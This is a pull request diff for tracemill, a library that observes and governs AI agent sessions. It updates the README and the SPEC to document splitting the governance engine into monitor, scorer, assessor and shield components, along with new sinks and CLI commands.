### PR TITLE
Governance: dissolve the GovernancePipeline god class into a SOLID monitor + shield

### DIFF
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 A pluggable event observation pipeline for AI agent sessions.
 
-Mills raw agent traces into structured, classified, risk-scored output. Framework-agnostic -- adding support for a new agent framework requires only a YAML mapping file.
+Mills raw agent traces into structured, classified, risk-scored, and governance-assessed output. Framework-agnostic -- adding support for a new agent framework requires only a YAML mapping file.
 
 ## What it does
 
@@ -13,9 +13,10 @@ Source → [Parser] → Adapter → Enricher → Pipeline → Sink(s)
 1. **Sources** transport raw data from files, HTTP endpoints, SSE streams, SQLite databases, or replays
 2. **Parsers** pre-process non-structured formats (markdown logs, chunked data) into structured dicts
 3. **Adapters** parse raw input into a common `SessionEvent` type using declarative YAML mappings
-4. **Enricher** adds metadata: tool pairing, duration, multi-dimensional classification, risk scoring, phase detection, visibility
-5. **Pipeline** routes enriched events to one or more storage sinks with error isolation
+4. **Enricher** adds metadata: tool pairing, duration, multi-dimensional classification, risk scoring, visibility
+5. **Pipeline** stamps live structure onto the stream -- phase, activity/step boundaries, and titles -- then routes enriched events to one or more storage sinks with error isolation
 6. **Sinks** write to storage backends or call custom handlers
+7. **Governance** (opt-in) scores the same events -- data labeling, taint / drift / budget tracking, and rule evaluation -- into per-event recommendations, with optional gate policies for consumers that want enforcement
 
 ## Install
 
@@ -79,7 +80,7 @@ pipelines:
 ```
 
 ```bash
-tracemill run  # (CLI runner -- planned)
+tracemill watch  # run a config-driven pipeline from tracemill.yaml
 ```
 
 No Python code required. Configure sources, pick a mapping, choose your sinks.
@@ -179,6 +180,54 @@ YAML-driven, multi-dimensional classification for tool invocations (14 modules, 
 
 Risk scoring produces a 0-100 score across 5 layers: structural, flag modifiers, injection patterns, pipeline taint, context adjustments.
 
+## Live structure
+
+Beyond per-event enrichment, the pipeline reconstructs the *shape* of a session as events
+stream in, using packaged CPU-only ONNX models (no torch, no GPU):
+
+- **Phase** -- each event is stamped with a coarse workflow phase (planning, implementation,
+  verification, exploration, review) live, as it arrives
+- **Boundaries** -- the stream is segmented into activities and their constituent steps,
+  stamped on `metadata.boundary`
+- **Titles** (opt-in) -- each activity/step segment gets a short human title, emitted
+  out-of-band as append-only `TitleUpdate` records so live emission is never blocked
+
+Phase and boundary inference are on by default; titling is opt-in (`enable_title=True`).
+See [Session naming](#session-naming) for how whole sessions are titled.
+
+## Governance & assessment
+
+Governance is a first-class stage of the pipeline, not a separate track. The same
+`SessionEvent` stream that feeds the sinks also drives a scoring engine that turns each
+tool call into a strongly typed assessment (`SessionMeta`, attached to the event's
+metadata under `governance`):
+
+- **Data labeling** -- sensitivity / provenance labels on tool inputs and outputs
+- **Information-flow control** -- taint tracking across tool calls, with violation counts
+- **Drift detection** -- MCP/tool and phase drift against expected profiles
+- **Budget tracking** -- token / cost / step budgets with threshold snapshots
+- **Rule evaluation** -- data-driven `recommendation_rules.yaml` yields a `RecommendedAction`
+  (`allow` / `warn` / `escalate` / `deny` / `transform`) plus the matched reason and evidence
+
+It is observation-first: by default the engine *recommends* and the consumer decides. For
+consumers that want tracemill to decide, the SDK ships an opt-in gate layer
+(`GatePolicy` -> `Verdict`) with preflight/postflight hooks and ready-made adapters for
+CrewAI, LangChain, and the Microsoft Agent Framework.
+
+```python
+from tracemill.governance.pipeline import GovernancePipeline
+
+gov = GovernancePipeline.create()          # zero-config, or pass GovernanceConfig
+meta = gov.score_tool_call_event(event)     # -> SessionMeta
+rec = meta.recommendation
+if rec and rec.recommended_action.value in ("deny", "escalate"):
+    alert(event, rec.reason_code)
+```
+
+The `tracemill` CLI exposes the same engine: `tracemill score` runs a preflight scoring
+HTTP server, `tracemill gate` applies a gate policy, and `tracemill watch` runs a full
+config-driven pipeline.
+
 ## Storage sinks
 
 All configurable via YAML -- no code required:
@@ -186,10 +235,13 @@ All configurable via YAML -- no code required:
 | Sink | Status | Output |
 | --- | --- | --- |
 | `CallbackSink` | ✅ Done | User-provided async callables (SDK use) |
-| `SqliteSink` | ⬜ Planned | Local SQLite database |
-| `JsonlSink` | ⬜ Planned | Append-only JSONL files |
-| `S3Sink` | ⬜ Planned | Cloud object storage |
-| `OtelSink` | ⬜ Planned | OpenTelemetry collector export |
+| `ConsoleSink` | ✅ Done | Pretty-printed events / assessments to terminal |
+| `JsonlSink` | ✅ Done | Append-only JSONL files (rotation supported) |
+| `SqliteSink` | ✅ Done | Local SQLite database |
+| `S3Sink` | ✅ Done | Cloud object storage |
+| `ParquetSink` | ✅ Done | Columnar Parquet files for analytics |
+| `OtelExporterSink` | ✅ Done | OpenTelemetry (OTLP) span export |
+| `WebhookSink` | ✅ Done | POST events / assessments to a webhook URL |
 
 ```yaml
 sinks:
@@ -236,7 +288,7 @@ See [SPEC.md](SPEC.md) for the full architecture specification.
 
 🚧 **Under development** -- not yet published to PyPI.
 
-Core pipeline is complete (sources, adapters, enricher, classification, risk scoring). Remaining work: storage sink implementations (SQLite, JSONL, S3), CLI runner, telemetry instrumentation. See [SPEC.md](SPEC.md) for full roadmap.
+The pipeline is feature-complete: sources, adapters, enricher, classification, risk scoring, live phase/boundary/title structuring, the governance/assessment engine, all 8 storage sinks, and the `tracemill` CLI all ship. Remaining work is narrow: opt-in telemetry self-metrics ([#48](https://github.com/dfinson/tracemill/issues/48)), an optional EventBus `subscribe()` convenience ([#47](https://github.com/dfinson/tracemill/issues/47)), and the PyPI release. See [SPEC.md](SPEC.md) for the full roadmap.
 
 ## License
 

--- a/README.md
+++ b/README.md
@@ -283,6 +283,7 @@ See [SPEC.md](SPEC.md) for the full architecture specification.
 - **Immutable domain objects** -- all events are frozen Pydantic models
 - **Error isolation** -- one failing sink cannot block others
 - **Data-driven rules** -- classification, risk scoring, MCP profiles all externalized to YAML
+- **Monitor + shield object model** -- governance dissolves into single-responsibility collaborators (one session-state writer, a side-effect-free assessor, an opt-in shield) wired by dependency injection; see [SPEC §22](SPEC.md)
 
 ## Status
 

--- a/SPEC.md
+++ b/SPEC.md
@@ -1118,9 +1118,17 @@ tracemill/
 │   │   ├── __init__.py
 │   │   ├── models.py
 │   │   └── phase_tracker.py     # PhaseTracker
-│   ├── governance/              # Governance / assessment engine (18 modules)
+│   ├── governance/              # Governance / assessment engine (26 modules)
 │   │   ├── __init__.py          # Public API re-exports
-│   │   ├── pipeline.py          # GovernancePipeline (score_tool_call -> EventTrace, process_event -> SessionMeta)
+│   │   ├── pipeline.py          # GovernancePipeline — composition root / facade (delegates)
+│   │   ├── monitor.py           # SessionMonitor — single writer (observe / process / lifecycle)
+│   │   ├── scorer.py            # Scorer — read-only preview (score_tool_call* / preflight)
+│   │   ├── context.py           # ContextBuilder — payload / event -> EnrichmentContext
+│   │   ├── phase1.py            # Phase1 — Phase-1 state-advance step (writer + preview share it)
+│   │   ├── assessor.py          # Assessor — (snapshot, event) -> SessionMeta (label+risk+drift)
+│   │   ├── registry.py          # SessionRegistry — residency + LRU eviction + reservations
+│   │   ├── codec.py             # MetaCodec — (de)serialize SessionMeta + snapshots
+│   │   ├── shield.py            # Shield — enforcement (gate context + pre/postflight + record)
 │   │   ├── results.py           # RecommendedAction, RiskRecommendation, SessionMeta, Evidence
 │   │   ├── types.py             # EnrichmentContext, ToolCallEvent, ToolResultEvent
 │   │   ├── state.py             # SessionState, budget / taint snapshots
@@ -1299,7 +1307,7 @@ tracemill/
 | CLI | ✅ Complete | `cli/` (Click): watch, replay, score, gate, detect, config, status, init, download-model |
 | Gate module | ✅ Complete | Sync scoring path + PII gate + registry (`gate/`, `gates/`) |
 | Live structuring (phase / boundary / title) | ✅ Complete | Packaged CPU-only ONNX models: PhaseInferencer + BoundaryInferencer default-on, TitleInferencer opt-in (emits `TitleUpdate`) |
-| Governance / assessment engine | ✅ Complete | `governance/` monitor + shield object model (SOLID): `SessionMonitor` (single writer), `SessionRegistry`, `Assessor`, `Shield`, one-counter `SessionState`, `GovernancePipeline` facade; plus labeler, rules, PII, IFC, integrity, drift, budget, observer, persistence. Epic #7 (#9–#27) delivered. See §22 |
+| Governance / assessment engine | ✅ Complete | `governance/` monitor + shield object model (SOLID): `SessionMonitor` (single writer), `Scorer` (read-only preview), `SessionRegistry`, `Assessor`, `Shield`, one-counter `SessionState`, `GovernancePipeline` facade; plus labeler, rules, PII, IFC, integrity, drift, budget, observer, persistence. Epic #7 (#9–#27) delivered. See §22 |
 | Configuration system | ✅ Complete | Hierarchical loading, env overrides, discriminated unions, bootstrap |
 | Classify data files (9 YAMLs) | ✅ Complete | Binary info, rules, profiles, risk config |
 | CI/CD | ✅ Complete | Lint, test matrix, publish, weekly audits |
@@ -1360,11 +1368,15 @@ API; the SDK `Pipeline` composes it with the observation backbone.
 
 | Collaborator | Single responsibility | Depends on |
 |---|---|---|
-| `SessionState` | Encapsulate one session's accumulators — **one** tool-call counter, budget dimensions, taint ledger, phase window, gate history. Mutated only through its own methods; exposes an immutable `snapshot()`. | — |
+| `SessionState` | Encapsulate one session's accumulators — **one** tool-call counter, budget dimensions, taint ledger, phase window, gate history. Mutated only through its own methods; exposes an immutable `snapshot()` and a detached `clone` for previews. | — |
 | `SystemStore` | Durability: idempotency reservations, atomic commit, crash recovery, audit persistence. | sqlite |
 | `SessionRegistry` | Residency: the one place sessions are created, found, and LRU-evicted; reservation bookkeeping. | `SystemStore` |
+| `ContextBuilder` | Bridge a raw hook payload / adapted `SessionEvent` into an `EnrichmentContext` (classification + shell-command analysis). | engine |
+| `Phase1` | The Phase-1 state-advance step — budget, taint (IFC), phase window, pressure — applied to whichever `SessionState` it is handed (the real one, or a clone). | budget, labeler |
 | `Assessor` | Turn `(snapshot, event)` into a `SessionMeta` — label + risk + recommendation + drift + MCP. Side-effect-free. | labeler, rules, engine |
-| `SessionMonitor` | The **single writer**: per event, advance `SessionState` (Phase 1) then call the `Assessor`. Owns `observe` / `preflight` / `lifecycle`. | `SessionRegistry`, `Assessor` |
+| `MetaCodec` | Serialize / deserialize `SessionMeta` and state snapshots for reservations and the audit trail. | — |
+| `SessionMonitor` | The **single writer**: per event, advance the real `SessionState` via `Phase1`, commit atomically, then call the `Assessor`. Owns `observe` / `process` / `lifecycle`. | `SessionRegistry`, `Phase1`, `Assessor`, `MetaCodec` |
+| `Scorer` | The **read side**: preview the same `Phase1` + `Assessor` against a **detached clone**, mutating no session state (audit-only persistence). Owns `score_tool_call*` / `preflight`. | `ContextBuilder`, `Phase1`, `Assessor`, `SessionRegistry` |
 | `GatePolicy` (Policy) | Map an assessed request/result to a `Verdict` (pre) / `PostflightVerdict` (post). An injected strategy. | — |
 | `Shield` | Runtime enforcement: build the gate context from `SessionState`, run the policy's pre/post chains, record allow/deny. | `GatePolicy`, `SessionRegistry` |
 | `gate_*` adapters | Bind one framework's execution hooks to the `Shield` (the edit-automaton at the edge). | `Shield` |
@@ -1375,6 +1387,7 @@ flowchart TB
   subgraph Facade["GovernancePipeline — composition root / facade"]
     direction TB
     MON["SessionMonitor<br/>(single writer)"]
+    SCO["Scorer<br/>(read-only preview)"]
     SH["Shield<br/>(enforcement)"]
   end
   REG["SessionRegistry<br/>(residency + eviction)"]
@@ -1385,11 +1398,14 @@ flowchart TB
 
   MON --> REG
   MON --> ASS
+  SCO --> REG
+  SCO --> ASS
   SH --> REG
   SH --> POL
   REG --> ST
   REG --> STORE
-  MON -. reads snapshot .-> ST
+  MON -. advances .-> ST
+  SCO -. clones · no write .-> ST
   SH -. reads via methods .-> ST
 
   classDef writer fill:#fde2e8,stroke:#b3365f;
@@ -1430,18 +1446,20 @@ Two compositions of the same collaborators:
   `SessionState`, so budget stays honest: a denied call never reaches the monitor's commit and
   costs no budget.
 
-`SessionMonitor` exposes three entry points, distinguished by state semantics:
+The facade exposes one **write** entry point (the monitor) and two **read** entry points (the
+scorer), distinguished by state semantics:
 
-| Method (facade) | Input | Session state | Returns | Use |
-|--------|-------|---------------|---------|-----|
-| `observe_event(event)` | `SessionEvent` | **advances** | `SessionMeta` | the pipeline stage (budget / taint / drift accrue) |
-| `score_tool_call_event(event)` | `SessionEvent` | read-only | `SessionMeta` | preflight from an adapted event |
-| `score_tool_call(payload)` | `dict` | read-only | `EventTrace` | preflight from a hook |
+| Method (facade) | Owner | Input | Session state | Returns | Use |
+|--------|--------|-------|---------------|---------|-----|
+| `observe_event(event)` | `SessionMonitor` | `SessionEvent` | **advances (persists)** | `SessionMeta` | the pipeline stage (budget / taint / drift accrue) |
+| `score_tool_call_event(event)` | `Scorer` | `SessionEvent` | read-only (clone) | `SessionMeta` | preflight from an adapted event |
+| `score_tool_call(payload)` | `Scorer` | `dict` | read-only (clone) | `EventTrace` | preflight from a hook |
 
-`observe_event` is the mutating stage the `EventPipeline` calls; `score_tool_call*` score against
-current state without committing. Internally the monitor is the single writer and the assessor is
-side-effect-free, so a read-only score is literally "assess a snapshot the monitor did not
-advance."
+`observe_event` is the mutating stage the `EventPipeline` calls; `score_tool_call*` preview against
+a **detached clone** of current state, committing nothing. Because the monitor is the single writer
+and the assessor is side-effect-free, a read-only score is literally "advance a throwaway clone the
+real session never sees, then assess its snapshot." Writer (`SessionMonitor`) and reader (`Scorer`)
+share the same `Phase1` and `Assessor`, so preview and live scoring cannot diverge.
 
 ### Determinism contract
 
@@ -1507,7 +1525,8 @@ the `.governance` (engine) / `.backbone` (`EventPipeline`) escape hatches.
 
 The composition root and facade, usable standalone. The `score` / `gate` CLIs and gating-only SDK
 use go straight to it; the SDK facade delegates to it. It constructs the `SessionRegistry`,
-`Assessor`, `SessionMonitor`, and `Shield`, then forwards to them.
+`Assessor`, `SessionMonitor` (writer), `Scorer` (read-only preview), and `Shield`, then forwards
+to them.
 
 ```python
 from tracemill.governance.pipeline import GovernancePipeline
@@ -1839,9 +1858,13 @@ src/tracemill/
 ├── trace.py                 # EventTrace, TraceStage (unified record)
 ├── governance/              # The monitor + shield engine
 │   ├── pipeline.py          # GovernancePipeline — composition root / facade (delegates)
-│   ├── monitor.py           # SessionMonitor — single writer (observe / preflight / lifecycle)
+│   ├── monitor.py           # SessionMonitor — single writer (observe / process / lifecycle)
+│   ├── scorer.py            # Scorer — read-only preview (score_tool_call* / preflight)
+│   ├── context.py           # ContextBuilder — payload / event -> EnrichmentContext
+│   ├── phase1.py            # Phase1 — the Phase-1 state-advance step (writer + preview share it)
 │   ├── registry.py          # SessionRegistry — residency + LRU eviction + reservations
 │   ├── assessor.py          # Assessor — (snapshot, event) -> SessionMeta (label+risk+drift)
+│   ├── codec.py             # MetaCodec — (de)serialize SessionMeta + snapshots
 │   ├── shield.py            # Shield — gate context + preflight/postflight + record allow/deny
 │   ├── state.py             # SessionState — one counter, mutated only via methods
 │   ├── persistence.py       # SystemStore — durability (reservations, atomic commit)

--- a/SPEC.md
+++ b/SPEC.md
@@ -99,8 +99,8 @@ tracemill was extracted from CodePlane as a standalone library. CodePlane's obse
 ### Data Flow Summary
 
 `
-Observation: Source → [Parser] → Adapter → Enricher → Pipeline → Sink(s)
-Gate:        Hook Payload → Adapter.parse_one() → Enricher.classify() → PolicyEngine → Verdict
+Observation: Source → [Parser] → Adapter → Enricher → Pipeline (SessionMonitor) → Sink(s)
+Gate:        Hook Payload → Adapter.parse_one() → Enricher.classify() → Shield (GatePolicy) → Verdict
                                     ↑ same classify/ rules ↑
 `
 
@@ -1299,7 +1299,7 @@ tracemill/
 | CLI | ✅ Complete | `cli/` (Click): watch, replay, score, gate, detect, config, status, init, download-model |
 | Gate module | ✅ Complete | Sync scoring path + PII gate + registry (`gate/`, `gates/`) |
 | Live structuring (phase / boundary / title) | ✅ Complete | Packaged CPU-only ONNX models: PhaseInferencer + BoundaryInferencer default-on, TitleInferencer opt-in (emits `TitleUpdate`) |
-| Governance / assessment engine | ✅ Complete | 18-module `governance/`: labeler, rules, PII, IFC, integrity, drift, budget, canonical hash, observer, persistence. Epic #7 (#9–#27) delivered. See §22 |
+| Governance / assessment engine | ✅ Complete | `governance/` monitor + shield object model (SOLID): `SessionMonitor` (single writer), `SessionRegistry`, `Assessor`, `Shield`, one-counter `SessionState`, `GovernancePipeline` facade; plus labeler, rules, PII, IFC, integrity, drift, budget, observer, persistence. Epic #7 (#9–#27) delivered. See §22 |
 | Configuration system | ✅ Complete | Hierarchical loading, env overrides, discriminated unions, bootstrap |
 | Classify data files (9 YAMLs) | ✅ Complete | Binary info, rules, profiles, risk config |
 | CI/CD | ✅ Complete | Lint, test matrix, publish, weekly audits |
@@ -1329,25 +1329,129 @@ tracemill/
 
 ---
 
-## §22 — SDK, Governance Stage & Gating
+## §22 — SDK, Runtime Monitor & Shield
 
-*Observe → structure backbone. Governance is one opt-in stage. Gating is an opt-in layer.*
+*One session-state authority. The **monitor** observes; the **shield** enforces. Both compose
+the same assessment. Objects with single responsibilities, wired by dependency injection.*
 
 ### Scope
 
-tracemill's pipeline observes, parses, enriches, classifies, risk-scores, and structures
-agent events (§9–§11). **Governance/assessment is one stage of that pipeline** — not a
-separate track, and not the whole pipeline. When enabled, it consumes the same enriched
-events and scores them (data labeling, information-flow control, drift detection, budget
-tracking, rule evaluation), stamping a `SessionMeta` onto `event.metadata.governance`
-before the sinks see it.
+tracemill observes, parses, enriches, classifies, risk-scores, and structures agent events
+(§9–§11). **Governance is neither a separate track nor the whole pipeline** — it is a *runtime
+monitor* over a session's event trace, plus an optional *shield* (runtime enforcement) at the
+framework's execution boundary.
 
-By default the stage is **observation-first**: it recommends (`allow` / `warn` /
-`escalate` / `deny` / `transform`) and the consumer decides. For consumers that want
-tracemill to decide, an **opt-in gate layer** (`GatePolicy` → `Verdict`) turns those
-recommendations into enforced verdicts using each framework's native blocking mechanism.
-Nothing is gated unless a `GatePolicy` is registered, so the default posture stays pure
-observation.
+* The **monitor** consumes enriched events, advances one per-session state, and produces an
+  assessment (data labeling, information-flow control, drift, budget, rule evaluation) stamped
+  onto `event.metadata.governance` as a `SessionMeta`. It is observation-first: it *recommends*
+  (`allow` / `warn` / `escalate` / `deny` / `transform`) and the consumer decides.
+* The **shield** is opt-in. When a `GatePolicy` is registered, it turns a recommendation into an
+  enforced `Verdict` at the framework's native pre/post-execution hook. Nothing is enforced
+  unless a policy is registered, so the default posture stays pure observation.
+
+Monitor and shield are **objects with single responsibilities composed by dependency injection**,
+not a monolith. This section specifies that object model.
+
+### The object model
+
+The engine dissolves into focused collaborators, each with one reason to change.
+`GovernancePipeline` is the **composition root / facade** that wires them and exposes the public
+API; the SDK `Pipeline` composes it with the observation backbone.
+
+| Collaborator | Single responsibility | Depends on |
+|---|---|---|
+| `SessionState` | Encapsulate one session's accumulators — **one** tool-call counter, budget dimensions, taint ledger, phase window, gate history. Mutated only through its own methods; exposes an immutable `snapshot()`. | — |
+| `SystemStore` | Durability: idempotency reservations, atomic commit, crash recovery, audit persistence. | sqlite |
+| `SessionRegistry` | Residency: the one place sessions are created, found, and LRU-evicted; reservation bookkeeping. | `SystemStore` |
+| `Assessor` | Turn `(snapshot, event)` into a `SessionMeta` — label + risk + recommendation + drift + MCP. Side-effect-free. | labeler, rules, engine |
+| `SessionMonitor` | The **single writer**: per event, advance `SessionState` (Phase 1) then call the `Assessor`. Owns `observe` / `preflight` / `lifecycle`. | `SessionRegistry`, `Assessor` |
+| `GatePolicy` (Policy) | Map an assessed request/result to a `Verdict` (pre) / `PostflightVerdict` (post). An injected strategy. | — |
+| `Shield` | Runtime enforcement: build the gate context from `SessionState`, run the policy's pre/post chains, record allow/deny. | `GatePolicy`, `SessionRegistry` |
+| `gate_*` adapters | Bind one framework's execution hooks to the `Shield` (the edit-automaton at the edge). | `Shield` |
+| `GovernancePipeline` | **Composition root + facade**: build the collaborators; delegate `observe_event` / `score_tool_call*` / `process_*` / `gate_*`. | all of the above |
+
+```mermaid
+flowchart TB
+  subgraph Facade["GovernancePipeline — composition root / facade"]
+    direction TB
+    MON["SessionMonitor<br/>(single writer)"]
+    SH["Shield<br/>(enforcement)"]
+  end
+  REG["SessionRegistry<br/>(residency + eviction)"]
+  ST["SessionState<br/>(one counter, methods only)"]
+  ASS["Assessor<br/>(label · risk · drift · recommend)"]
+  POL["GatePolicy<br/>(Verdict strategy)"]
+  STORE["SystemStore<br/>(durability)"]
+
+  MON --> REG
+  MON --> ASS
+  SH --> REG
+  SH --> POL
+  REG --> ST
+  REG --> STORE
+  MON -. reads snapshot .-> ST
+  SH -. reads via methods .-> ST
+
+  classDef writer fill:#fde2e8,stroke:#b3365f;
+  class MON writer;
+```
+
+* **Single Responsibility** — no object both accumulates state and decides enforcement.
+* **Open/Closed** — `Assessor` and `GatePolicy` are strategies; swap them without editing the
+  monitor.
+* **Liskov** — any `Assessor` / `GatePolicy` implementation is substitutable.
+* **Interface Segregation** — the shield reads gate history through narrow `SessionState`
+  methods, never its fields.
+* **Dependency Inversion** — the monitor and shield depend on injected collaborators,
+  constructed once at the composition root.
+
+### One session-state authority
+
+`SessionState` owns exactly one tool-call counter. It previously carried two — a budget counter
+(advanced on observation) and a gate counter (advanced on allow) — the same quantity written by
+two owners on two clocks, never reconciled. They are now a single `tool_call_count` advanced
+through one method; budget pressure and the gate context both read it. State is mutated only
+through methods (`observe_tool_call`, `record_allow`, `record_denial`, `add_taint`, …), and
+collaborators that need gate history call methods (`denied_count`, `prior_verdicts`,
+`prior_tool_call_ids`) rather than touching fields. Encapsulation makes the twin-counter and
+cross-module-poke classes of bug unrepresentable.
+
+### Monitor observes, shield enforces
+
+Two compositions of the same collaborators:
+
+* **Observation (monitor alone).** Every pushed event is enriched → classified → structured →
+  **observed** (state advances once, on the canonical tool-call event) → assessed → emitted with
+  its `SessionMeta`. With no `GatePolicy`, nothing is enforced.
+* **Enforcement (monitor + shield).** At a framework's pre-execution hook the shield builds a
+  gate context from `SessionState`, runs the policy's preflight chain, and returns a `Verdict`
+  (allow / deny) enforced by the framework's native mechanism; a postflight chain can
+  redact / suppress / alert on the result. The shield records the outcome back into the same
+  `SessionState`, so budget stays honest: a denied call never reaches the monitor's commit and
+  costs no budget.
+
+`SessionMonitor` exposes three entry points, distinguished by state semantics:
+
+| Method (facade) | Input | Session state | Returns | Use |
+|--------|-------|---------------|---------|-----|
+| `observe_event(event)` | `SessionEvent` | **advances** | `SessionMeta` | the pipeline stage (budget / taint / drift accrue) |
+| `score_tool_call_event(event)` | `SessionEvent` | read-only | `SessionMeta` | preflight from an adapted event |
+| `score_tool_call(payload)` | `dict` | read-only | `EventTrace` | preflight from a hook |
+
+`observe_event` is the mutating stage the `EventPipeline` calls; `score_tool_call*` score against
+current state without committing. Internally the monitor is the single writer and the assessor is
+side-effect-free, so a read-only score is literally "assess a snapshot the monitor did not
+advance."
+
+### Determinism contract
+
+Replaying a trace must reproduce the live assessment. Therefore **non-deterministic enrichment is
+an injected collaborator whose output is captured onto the event, never re-derived inside state
+mutation.** ML structurers (phase / boundary / title, §11) run once at ingestion and write their
+result onto the event; the monitor's Phase-1 mutation reads only captured values and
+deterministic heuristics. Replay injects a "captured-value" inferencer and reaches identical
+state. (Dependency Inversion applied to time: the *source* of a value is a dependency, so live
+and replay differ only in which implementation is injected.)
 
 ### The SDK facade: `tracemill.sdk.Pipeline`
 
@@ -1355,18 +1459,17 @@ The SDK's top-level entry point composes tracemill's two halves into one object:
 
 * the **observation backbone** (`tracemill.pipeline.EventPipeline`) — enrich → classify →
   ML-structure (phase / boundary / title) → sinks, and
-* the **governance engine** (`tracemill.governance.pipeline.GovernancePipeline`) — scoring,
-  budgets / drift, and the gating helpers.
+* the **governance engine** (`GovernancePipeline`) — the monitor (+ optional shield).
 
-Governance is wired in as **one stage**: when enabled, each pushed event is scored and its
-`SessionMeta` stamped onto `event.metadata.governance` just before the sinks. It is not a
-separate pipeline and not a precondition — structuring runs with or without it.
+Governance is wired in as **one stage**: when enabled, each pushed event is observed and its
+`SessionMeta` stamped onto `event.metadata.governance` just before the sinks. Structuring runs
+with or without it.
 
 ```python
 from tracemill.sdk import Pipeline
 from tracemill.sinks.jsonl import JsonlSink
 
-# Observe a stream: enrich -> classify -> structure -> govern -> emit
+# Observe a stream: enrich -> classify -> structure -> observe -> emit
 async with Pipeline.create(sinks=[JsonlSink("events.jsonl")]) as pipeline:
     async for event in adapter.stream(...):
         await pipeline.push(event)   # emitted events carry metadata.governance
@@ -1382,32 +1485,29 @@ Pipeline.create(
 Pipeline.from_config(path=None, *, policy=None, sinks=None, ...) -> Pipeline
 ```
 
-* `config` — a `GovernanceConfig` for the governance engine (in-memory DB + defaults when
-  omitted). `from_config` loads it from a `tracemill.yaml` instead.
-* `policy` — a `GatePolicy` enabling the gating layer (the `gate_*` helpers). Omit for
+* `config` — a `GovernanceConfig` for the engine (in-memory DB + defaults when omitted).
+  `from_config` loads it from a `tracemill.yaml` instead.
+* `policy` — a `GatePolicy` enabling the shield (the `gate_*` helpers). Omit for
   observation-only usage.
 * `sinks` — observation destinations for pushed events. Omit for gating-only usage.
-* `enable_structure` / `enable_title` — phase + boundary (and optional title) ML
-  structuring. Models load lazily on first push, so gating-only usage pays nothing.
-* `governance` — wire the governance engine in as a stage so pushed events get
-  `metadata.governance` stamped (default `True`). Set `False` for pure observation;
-  `gate_*` / `score_tool_call` still use the engine.
+* `enable_structure` / `enable_title` — phase + boundary (and optional title) ML structuring.
+  Models load lazily on first push, so gating-only usage pays nothing.
+* `governance` — wire the monitor in as a stage so pushed events get `metadata.governance`
+  stamped (default `True`). Set `False` for pure observation; `gate_*` / `score_tool_call` still
+  use the engine.
 
-The returned `Pipeline` exposes:
-
-* `await push(event)` / `push_span(span)` / `push_usage(usage)` / `flush()` / `close()`,
-  and `async with` (closes on exit).
-* `score_tool_call(payload) -> EventTrace` — read-only preflight (delegates to the engine).
-* `gate_crewai()`, `gate_langchain(tool)`, `gate_langgraph(tools)`,
-  `gate_semantic_kernel(kernel)`, `gate_maf()`, `gate_smolagents(agent_cls=None)`,
-  `gate_pydantic_ai(agent)`, `gate_openai_agents(agent)` — opt-in gating.
-* `.governance` (the `GovernancePipeline` engine) and `.backbone` (the `EventPipeline`) —
-  escape hatches for advanced use.
+The returned `Pipeline` exposes `await push(event)` / `push_span(span)` / `push_usage(usage)` /
+`flush()` / `close()`, `async with` (closes on exit), `score_tool_call(payload) -> EventTrace`
+(read-only preflight), the `gate_*` helpers (`gate_crewai()`, `gate_langchain(tool)`,
+`gate_langgraph(tools)`, `gate_semantic_kernel(kernel)`, `gate_maf()`,
+`gate_smolagents(agent_cls=None)`, `gate_pydantic_ai(agent)`, `gate_openai_agents(agent)`), and
+the `.governance` (engine) / `.backbone` (`EventPipeline`) escape hatches.
 
 ### The governance engine: `GovernancePipeline`
 
-The scoring stage + gating engine, usable standalone. The `score` / `gate` CLIs and
-gating-only SDK use go straight to it; the facade delegates to it.
+The composition root and facade, usable standalone. The `score` / `gate` CLIs and gating-only SDK
+use go straight to it; the SDK facade delegates to it. It constructs the `SessionRegistry`,
+`Assessor`, `SessionMonitor`, and `Shield`, then forwards to them.
 
 ```python
 from tracemill.governance.pipeline import GovernancePipeline
@@ -1424,21 +1524,8 @@ trace = gov.score_tool_call({
 # trace.suggested_action == "escalate"; trace.reason == "risk_score_danger"
 ```
 
-Three scoring entry points, distinguished by state semantics:
-
-| Method | Input | Session state | Returns | Use |
-|--------|-------|---------------|---------|-----|
-| `score_tool_call(payload)` | `dict` | read-only | `EventTrace` | preflight from a hook |
-| `score_tool_call_event(event)` | `SessionEvent` | read-only | `SessionMeta` | preflight from an adapted event |
-| `observe_event(event)` | `SessionEvent` | **mutating** | `SessionMeta` | the pipeline stage (budget/taint/drift accrue) |
-
-`observe_event` is the method the `EventPipeline` governance stage calls: it runs the full
-state-mutating observation path and returns the `SessionMeta` stamped onto
-`metadata.governance`. `score_tool_call*` are read-only — they score against current state
-but never mutate budget / taint / drift.
-
-`EventTrace` (`tracemill.trace`) is the unified pipeline record — identity, classification,
-and assessment on one frozen object (abridged):
+`EventTrace` (`tracemill.trace`) is the unified pipeline record — identity, classification, and
+assessment on one frozen object (abridged):
 
 ```python
 @dataclass(frozen=True, slots=True)
@@ -1454,7 +1541,7 @@ class EventTrace:
     action: tuple[Action, ...]
     capability: tuple[Capability, ...]
     structure: tuple[Structure, ...]
-    # assessment (scorer fills)
+    # assessment (assessor fills)
     risk_score: int | None
     risk_band: RiskBand | None
     suggested_action: Recommendation | None   # allow/warn/escalate/deny/transform
@@ -1464,8 +1551,8 @@ class EventTrace:
 
 `SessionMeta` (`tracemill.governance.results`) is the richer stateful output attached to
 `event.metadata.governance`: `classification`, `risk_assessment`, `recommendation` (a
-`RiskRecommendation` with `.recommended_action`, `.reason_code`, `.transform`),
-`budget_snapshot`, `drift`, `mcp_alerts`, `evidence`.
+`RiskRecommendation` with `.recommended_action`, `.reason_code`, `.transform`), `budget_snapshot`,
+`drift`, `mcp_alerts`, `evidence`.
 
 The recommendation enum (`tracemill.governance.results`):
 
@@ -1478,16 +1565,16 @@ class RecommendedAction(StrEnum):
     TRANSFORM = "transform"
 ```
 
-These are **recommendations from the rules engine**. On their own they enforce nothing; a
-registered `GatePolicy` is what turns a recommendation into an enforced `Verdict`.
+These are **recommendations from the rules engine** (the `Assessor`). On their own they enforce
+nothing; a registered `GatePolicy` is what turns a recommendation into an enforced `Verdict` at
+the `Shield`.
 
 ### Interaction Models
 
-#### Push: observation (governance as a stage)
+#### Push: observation (the monitor as a stage)
 
-Every event pushed through the pipeline is enriched, classified, optionally structured,
-scored, and emitted with its `SessionMeta` on `metadata.governance`. A `CallbackSink` can
-react to each one:
+Every event pushed through the pipeline is enriched, classified, optionally structured, observed,
+and emitted with its `SessionMeta` on `metadata.governance`. A `CallbackSink` can react to each:
 
 ```python
 from tracemill.sdk import Pipeline
